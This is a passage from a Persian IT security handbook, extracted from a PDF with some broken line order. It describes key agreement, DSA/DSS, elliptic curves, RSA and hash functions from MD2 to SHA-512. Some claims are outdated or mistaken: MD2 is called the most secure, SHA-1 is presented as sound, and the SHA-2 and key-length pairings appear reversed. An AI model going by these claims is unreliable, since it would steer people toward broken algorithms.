‫ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺑﺮ ﺳﺮ ﭼﻨﺪ ﻣﻘﺪﺍﺭ ﻋﺪﺩﻱ ﻣﺘﺪﺍﻭﻝ ﺗﻮﺍﻓﻖ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺁﻧﮕﺎﻩ ﻫﺮ ﻃﺮﻑ ﻳﻚ ﻛﻠﻴﺪ ﭘﺪﻳـﺪ ﻣـﻲﺁﻭﺭﺩ‪ .‬ﺗﺒـﺪﻳﻼﺕ ﺭﻳﺎﺿـﻲ ﻛﻠﻴـﺪﻫﺎ‬
‫ﻣﺒﺎﺩﻟﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺁﻧﮕﺎﻩ ﻫﺮ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻛﻠﻴﺪ ﻧﺸﺴﺖ‪ ٩٦‬ﺛﺎﻟﺚ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨـﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﻣﻬـﺎﺟﻤﻲ ﻛـﻪ ﻫـﺮ ﺩﻭ ﻣﻘـﺪﺍﺭ‬
‫ﺗﺒﺎﺩﻝﺷﺪﻩ ﺭﺍ ﻣﻲﺩﺍﻧﺪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺪﺳﺖ ﺁﻳﺪ‪.‬‬

‫‪DSA/DSS‬‬
‫‪٩٨‬‬ ‫‪٩٧‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ )‪ (DSS‬ﺗﻮﺳﻂ ﺁﮊﺍﻧﺲ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ‬
‫‪١٠٠‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻋﻤﻮﻣﻲ ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ )‪ ٩٩(FIPS‬ﺍﻧﺘﺨـﺎﺏ ﺷـﺪ‪ DSS .‬ﺑـﺮ ﺍﺳـﺎﺱ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ )‪(DSA‬‬
‫ﭘﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ‪ DSA‬ﻫﺮ ﻃﻮﻟﻲ ﺭﺍ ﺑﺮﺍﻱ ﻛﻠﻴﺪ ﻣﺠﺎﺯ ﻣﻲﺷﻤﺎﺭﺩ‪ ،‬ﻭﻟﻲ ﺩﺭ ‪ DSS FIPS‬ﻓﻘﻂ ﻛﻠﻴﺪﻫﺎﻱ ﺑﺎ ﻃﻮﻝ ﺑـﻴﻦ ‪۵۱۲‬‬
‫ﻭ ‪ ۱۰۲۴‬ﺑﻴﺖ ﻣﺠﺎﺯ ﻫﺴﺘﻨﺪ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﮔﻔﺘﻪ ﺷﺪ ‪ DSS‬ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﺩ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﻳـﻚ‬
‫ﻧﻮﻉ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ‪ DSA‬ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬

‫ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ‬
‫ﻱ ﻛﻠﻴﺪ ﻫﻤﮕﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺠﺎﻱ ﺭﻭﺵ ﻗﺪﻳﻤﻲ ﺗﻮﺍﺑﻊ ﻟﮕﺎﺭﻳﺘﻤﻲ‪ ،‬ﻣﺒﺘﻨﻲ ﺑﺮ‬ ‫ﻱ ﺭﻣﺰﮔﺬﺍﺭ ﹺ‬
‫ﻲ ﺑﻴﻀﻮﻱ ﺳﻴﺴﺘﻤﻬﺎ ﹺ‬ ‫ﻱ ﻣﻨﺤﻨ ﹺ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭ ﹺ‬
‫ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻣﺰﻳﺖ ﻛﺎﺭﺑﺮﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺤﻨﻲ ﺑﻴﻀﻮﻱ ﺍﺯ ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻧـﺸﺄﺕ ﻣـﻲﮔﻴـﺮﺩ ﻛـﻪ ﻫـﻴﭻ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﻗﺎﺑـﻞ‬
‫ﻣﺤﺎﺳﺒﻪﺍﻱ ﺑﺮﺍﻱ ﻣﺤﺎﺳﺒﺔ ﻟﮕﺎﺭﻳﺘﻤﻬﺎﻱ ﻣﻨﻔﺼﻞ ﻣﻨﺤﻨﻴﻬﺎﻱ ﺑﻴﻀﻮﻱ ﺷﻨﺎﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻛﻮﺗﺎﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻨﺤﻨﻲ ﺑﻴﻀﻮﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﺟﻪ ﺑﺎﻻﺋﻲ ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻪ ﺍﺭﻣﻐﺎﻥ ﺑﻴﺎﻭﺭﻧﺪ‪ ،‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﻣﺤﺎﺳﺒﺎﺕ ﺁﻧﻬﺎ ﻫﻢ ﺑﺴﻴﺎﺭ‬
‫ﺳﺮﻳﻊ ﺍﺳﺖ‪ .‬ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻛﺎﺭﺍﻳﻲ ﺑﺎﻻ ﺑﺼﻮﺭﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ‪.‬‬

‫‪RSA‬‬
‫‪ RSA‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺸﻬﻮﺭ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻫﻤﮕﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۷۷‬ﻣﻴﻼﺩﻱ ﺗﻮﺳﻂ ﺳﻪ ﺍﺳﺘﺎﺩ ﺩﺍﻧﺸﮕﺎﻩ ‪ MIT‬ﺑﻪ ﻧﺎﻣﻬﺎﻱ ﺭﻭﻟﻨﺪ‬
‫ﺭﻳﻮﺳﺖ‪ ،‬ﺍﺩﻱ ﺷﻤﻴﺮ‪ ،١٠١‬ﻭ ﻟﺌﻮﻧﺎﺭﺩ ﺁﺩﻟﻤﻦ‪ ١٠٢‬ﭘﺪﻳﺪ ﺁﻣﺪ‪ .‬ﺍﺯ ‪ RSA‬ﻫﻢ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻫـﻢ ﺑﻌﻨـﻮﺍﻥ ﻣﺒﻨـﺎﻱ ﻳـﻚ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺳﻴﺴﺘﻢ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﺍﺻﺎﻟﺖ ﻳﺎ ﺳﻨﺪﻳﺖ ﺍﻃﻼﻋﺎﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﻧـﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻢ‪ ،‬ﻛﻠﻴﺪ ﺭﻣﺰ ﺑﺴﺘﻪ ﺑﻪ ﻧﻮﻋﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮ ﻃﻮﻟﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬

‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ‬
‫ﻻ ‪ ۱۲۸‬ﺗﺎ ‪ ۲۵۶‬ﺑﻴـﺖ ﻃـﻮﻝ‬
‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﻳﻚ ﻓﺎﻳﻞ )ﺑﺰﺭﮒ ﻳﺎ ﻛﻮﭼﻚ( ﺭﺍ ﺑﻪ ﻳﻚ ﻋﺪﺩ ﺑﺰﺭﮒ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺩﺍﺭﺩ‪ .‬ﺑﻬﺘﺮﻳﻦ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻭﺍﺟﺪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬

‫‪96‬‬ ‫‪Session Key‬‬


‫‪97‬‬ ‫‪Digital Signature Standard‬‬
‫‪98‬‬ ‫)‪U.S. National Security Agency (NSA‬‬
‫‪99‬‬ ‫‪Federal Information Processing Standard‬‬
‫‪100‬‬ ‫‪Digital Signature Algorithm‬‬
‫‪101‬‬ ‫‪Adi Shamir‬‬
‫‪102‬‬ ‫‪Leonard Adleman‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٩٨‬‬

‫ﺍﻟﻒ( ﻫﺮ ﺑﻴﺖ ﺧﺮﻭﺟﻲ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﺗﺤﺖﺗﺄﺛﻴﺮ ﻫﻤﺔ ﺑﻴﺘﻬﺎﻱ ﻭﺭﻭﺩﻱ ﺗﺎﺑﻊ ﺍﺳﺖ‪.‬‬
‫ﺏ( ﺍﮔﺮ ﻳﻚ ﺑﻴﺖ ﻣﻔﺮﻭﺽ ﻭﺭﻭﺩﻱ ﺗﺎﺑﻊ ﺗﻐﻴﻴﺮ ﻛﻨﺪ‪ ،‬ﻫﺮ ﺑﻴﺖ ﺧﺮﻭﺟﻲ ﺗﺎﺑﻊ ‪ ۵۰‬ﺩﺭﺻﺪ ﺷﺎﻧﺲ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻥ ﺩﺍﺭﺩ‪.‬‬
‫ﺝ( ﺍﮔﺮ ﻳﻚ ﻓﺎﻳﻞ ﻭﺭﻭﺩﻱ ﻭ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻣﺘﻨﺎﻇﺮ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ‪ ،‬ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﻧﺒﺎﻳﺪ ﺗﻮﺍﻧﺴﺖ ﻓﺎﻳﻞ ﺩﻳﮕﺮﻱ ﺑﺎ ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪﭘﻴﺎﻡ‬
‫ﻣﺸﺎﺑﻪ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﺩﻭ ﻓﺎﻳﻞ ﻣﺘﻔﺎﻭﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻣﺸﺎﺑﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺗﻼﻗﻲ‪ ١٠٣‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻳـﻚ ﺗـﺎﺑﻊ‬
‫ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻳﻤﻦ ﺑﺎﺷﺪ‪ ،‬ﻻﺯﻡ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳﺎ ﺗﻮﻟﻴﺪ ﺍﻳﻦ ﺗﻼﻗﻲﻫﺎ ﻋﻤﻠﻲ ﻧﺒﺎﺷﺪ‪.‬‬
‫ﻼ ﭼﻨﺪ ﻧﻤﻮﻧﻪ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺴﻴﺎﺭﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺫﻳ ﹰ‬

‫‪MD2‬‬
‫‪١٠٤‬‬
‫ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﺓ ‪ ،۲‬ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ‪ .‬ﺍﻳﻦ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺩﺭ ﻣﻴﺎﻥ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻳﻤﻦﺗﺮﻳﻦ ﺗـﺎﺑﻊ ﺭﻳﻮﺳـﺖ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﺤﺎﺳﺒﺎﺗﺶ ﻧﻴﺰ ﺑﻴﺸﺘﺮﻳﻦ ﺯﻣﺎﻥ ﺭﺍ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ‪ MD2‬ﺑﻨﺪﺭﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ‪ MD2 .‬ﻳـﻚ ﺧﻼﺻـﺔ ‪۱۲۸‬‬
‫ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪MD4‬‬
‫"ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﺓ ‪ "۴‬ﻫﻢ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ‪ .‬ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﺳﺮﻳﻌﺘﺮ ﺑـﺮﺍﻱ ‪ MD2‬ﺍﺑـﺪﺍﻉ‬
‫ﺷﺪ‪ .‬ﻣﺘﻌﺎﻗﺒﹰﺎ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪ ﻛﻪ ‪ MD4‬ﻧﻘﺎﻁ ﺿﻌﻒ ﺑﺎﻟﻘﻮﻩ ﺩﺍﺭﺩ‪ .‬ﻳﻌﻨﻲ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻓﺎﻳﻠﻲ ﭘﻴﺪﺍ ﺷﻮﺩ ﻛﻪ ‪ MD4‬ﻣـﺸﺎﺑﻬﻲ ﺑـﺎ‬
‫ﻳﻚ ﻓﺎﻳﻞ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﻟﻴﺪ ﻛﻨﺪ‪ ،‬ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻧﻴﺎﺯ ﺑﻪ ﺟﺴﺘﺠﻮﻱ ‪ brute force‬ﺑﺎﺷﺪ )ﻛﻪ ﺍﻟﺒﺘﻪ ﺑﻪ ﻫﻤﺎﻥ ﺩﻟﻴﻞ ﻛﻪ ﺟـﺴﺘﺠﻮ ﺩﺭ ﻓـﻀﺎﻱ ﻛﻠﻴـﺪ ‪۱۲۸‬‬
‫ﺑﻴﺘﻲ ﻋﻤﻠﻲ ﻧﻴﺴﺖ‪ ،‬ﺟﺴﺘﺠﻮﻱ ‪ brute force‬ﻫﻢ ﻋﻤﻠﻲ ﻧﻤﻲﺑﺎﺷﺪ(‪ MD4 .‬ﻧﻴﺰ ﻳﻚ ﺧﻼﺻﺔ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪MD5‬‬
‫"ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﻩ ‪ "۵‬ﻧﻴﺰ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ‪ ،MD5 .‬ﺍﺻﻼﺡ ﺷﺪﺓ ‪ MD4‬ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻤﻦﺗﺮ ﻛﺮﺩﻥ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﺯ ‪ MD5‬ﺑﻪ ﻭﻓﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭ ﺗﺎﺑﺴﺘﺎﻥ ‪ ۱۹۹۶‬ﭼﻨﺪ ﻧﻘﺺ ﺩﺭ ﺁﻥ ﻛﺸﻒ ﺷﺪ ﻛﻪ ﻣﻮﺟﺐ‬
‫ﺷﺪ ﮔﻮﻧﻪﻫﺎﺋﻲ ﺍﺯ ﺗﻼﻗﻲﻫﺎ ﺭﺍ ﺑﺘﻮﺍﻥ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺿﻌﻴﻒﺷﺪﺓ ﺁﻥ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ‪ MD5‬ﺁﺭﺍﻡ ﺁﺭﺍﻡ ﺭﻭﺍﺝ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻣـﻲﺩﻫـﺪ‪.‬‬
‫ﺍﺯ ﻫﺮﺩﻭﻱ ‪ MD5‬ﻭ ‪ SHA-1‬ﺩﺭ ﻓﻨﺎﻭﺭﻱ ‪ SSL‬ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ MD5 .‬ﻧﻴﺰ ﻳﻚ ﺧﻼﺻﻪ ‪ ۱۲۸‬ﺑﻴﺘﻲ‬
‫ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪SHA‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ‪ hash‬ﺍﻳﻤﻦ‪ ،١٠٥‬ﻣﺮﺗﺒﻂ ﺑﺎ ‪ MD4‬ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻫﻤـﺮﺍﻩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣﺆﺳـﺴﺔ ﻣﻠـﻲ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻭ‬
‫ﻓﻨﺎﻭﺭﻱ )‪ (NIST's DSS‬ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻣﺪﺕ ﻛﻮﺗﺎﻫﻲ ﺑﻌﺪ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ‪ NIST ،SHA‬ﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ ‪ SHA‬ﺑﺪﻭﻥ ﻳﻚ ﺗﻐﻴﻴﺮ ﻛﻮﭼﻚ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺖ‪ SHA .‬ﻳﻚ ﺧﻼﺻﺔ ‪ ۱۶۰‬ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪SHA-1‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ "‪ hash‬ﺍﻳﻤﻦ ﺍﺻﻼﺡ ﺷﺪﻩ" ﻧﺴﺒﺖ ﺑﻪ ‪ SHA‬ﻛﻤﻲ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﺩﺍﻧﺴﺘﻪ ﻧﻴﺴﺖ ﻛﻪ ﺁﻳﺎ ﺍﻳﻦ ﺗﻐﻴﻴـﺮﺍﺕ ‪SHA-1‬‬
‫ﺭﺍ ﻧﺴﺒﺖ ﺑﻪ ‪ SHA‬ﺍﻳﻤﻦﺗﺮ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪ ،‬ﺍﻣﺎ ﻋﺪﺓ ﺯﻳﺎﺩﻱ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﭼﻨﻴﻦ ﻣﻲﻛﻨﺪ‪ SHA-1 .‬ﻫﻢ ﻳﻚ ﺧﻼﺻﺔ ‪ ۱۶۰‬ﺑﻴﺘـﻲ ﺗﻮﻟﻴـﺪ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬

‫‪103 Collision‬‬
‫‪104 Message Digest #2‬‬
‫‪105 Secure Hash Algorithm‬‬
‫‪٢٩٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫‪SHA-512 ،SHA-384 ،SHA-256‬‬


‫ﺗﻮﺍﺑﻊ ‪ ،۳۸۴ ،۲۵۶ hash‬ﻭ ‪ ۵۱۲‬ﺑﻴﺘﻲ ﺑﺘﺮﺗﻴﺐ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ ،۱۹۲ ،۲۵۶‬ﻭ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺗﻮﺍﺑﻊ ﺗﻮﺳﻂ ‪ NIST‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺟﻬﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺸﺮﻓﺘﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺷﺪﻧﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺗﻮﺍﺑﻊ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺳﻨﺘﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺑﻠﻮﻛﻲ ﻣﺜﻞ ‪ DES‬ﺑﻌﻨﻮﺍﻥ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴـﺎﻡ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺎﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻌﻨﻮﺍﻥ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴـﺎﻡ ﻛـﺎﻓﻲ ﺍﺳـﺖ ﺗـﺎﺑﻊ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺩﺭ ﺣﺎﻟـﺖ ﺭﻣـﺰﻱﺳـﺎﺯﻱ‬
‫ﺑﺎﺯﺧﻮﺭ‪ ١٠٦‬ﺍﺟﺮﺍ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻛﻠﻴﺪ‪ ،‬ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰﻱ ﻛﻪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﻭ ﻣﺨﺼﻮﺹ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩ ﺍﺳﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﺋﻴـﺪ‪ .‬ﺗﻤـﺎﻡ‬
‫ﻓﺎﻳﻞ ﻭﺭﻭﺩﻱ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺁﺧﺮﻳﻦ ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ‪ ،‬ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺳﺖ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ‪hash‬ﻫﺎﻱ‬
‫ﻋﺎﻟﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻭﻟﻲ ﺑﺴﻴﺎﺭ ﻛﻨﺪﺗﺮ ﺍﺯ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺳﺎﺑﻖﺍﻟﺬﻛﺮ ﻫﺴﺘﻨﺪ‪.‬‬
